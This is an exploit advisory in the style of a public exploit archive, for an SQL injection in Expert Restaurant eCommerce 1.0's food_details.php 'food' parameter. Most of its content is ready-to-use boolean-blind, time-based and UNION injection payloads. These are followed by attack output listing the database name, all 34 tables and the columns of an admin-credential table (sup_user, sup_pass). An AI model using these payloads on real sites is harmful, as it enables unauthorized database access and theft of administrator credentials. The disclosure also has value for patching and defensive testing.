Headline
Expert Restaurant eCommerce 1.0 SQL Injection
Expert Restaurant eCommerce version 1.0 suffers from a remote SQL injection vulnerability.
┌┌───────────────────────────────────────────────────────────────────────────────────────┐││ C r a C k E r ┌┘┌┘ T H E C R A C K O F E T E R N A L M I G H T ││└───────────────────────────────────────────────────────────────────────────────────────┘┘ ┌──── From The Ashes and Dust Rises An Unimaginable crack.... ────┐┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ [ Vulnerability ] ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: Author : CraCkEr :│ Website : https://www.codester.com/items/20872/ ││ Vendor : Expert IT Solution ││ Software : Expert Restaurant eCommerce 1.0 ││ Vuln Type: SQL Injection ││ Impact : Database Access ││ ││────────────────────────────────────────────────────────────────────────────────────────││ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘: :│ Release Notes: ││ ═════════════ ││ ││ SQL injection attacks can allow unauthorized access to sensitive data, modification of ││ data and crash the application or make it unavailable, leading to lost revenue and ││ damage to a company's reputation. ││ │┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Greets: The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL CryptoJob (Twitter) twitter.com/0x0CryptoJob ┌┌───────────────────────────────────────────────────────────────────────────────────────┐┌┘ © CraCkEr 2023 ┌┘└───────────────────────────────────────────────────────────────────────────────────────┘┘Path: /food_details.phphttps://www.website/food_details.php?food=[SQLI]GET parameter 'food' is vulnerable to SQL Injection---Parameter: food (GET) Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: food=1' AND 8591=8591 AND 'bGwn'='bGwn Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: food=1' AND (SELECT 8111 FROM (SELECT(SLEEP(5)))Tejf) AND 'cFVV'='cFVV Type: UNION query Title: Generic UNION query (NULL) - 17 columns Payload: food=-8249' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,CONCAT(0x716b6b6a71,0x646241754464636d7a616e515664594d665268756c73555855704a4d6f7550666543495077594a71,0x716a767871),NULL,NULL,NULL,NULL,NULL,NULL,NULL-- ----[+] Starting the Attackfetching current databasecurrent database: 'sagor_****_restu'fetching tables[34 tables]+--------------------------+| add_to_cart_view || admin_url || contact_manage || currencies || customer_info || delivery_live_status || expense_manage || food_category || food_dish_manage || food_dish_vari_man || food_field_variant || food_field_variant_value || food_order_confirm || food_review || food_sub_category || food_tag || gallery_manage || hall_manage || income_manage || kitchen_live_sta || menu_manage || opening_manage || order_accounts || order_other_address || page_manage || payment_gateway || shipping_charge || site_setting || slider_manage || social_manage || sup_ad_log || table_book || table_manage || team_manage |+--------------------------+fetching columns for table 'sup_ad_log'[5 columns]+----------------+--------------+| Column | Type |+----------------+--------------+| status | varchar(100) || id | int(11) || sup_admin_name | varchar(100) || sup_pass | varchar(100) || sup_user | varchar(100) |+----------------+--------------+[-] Done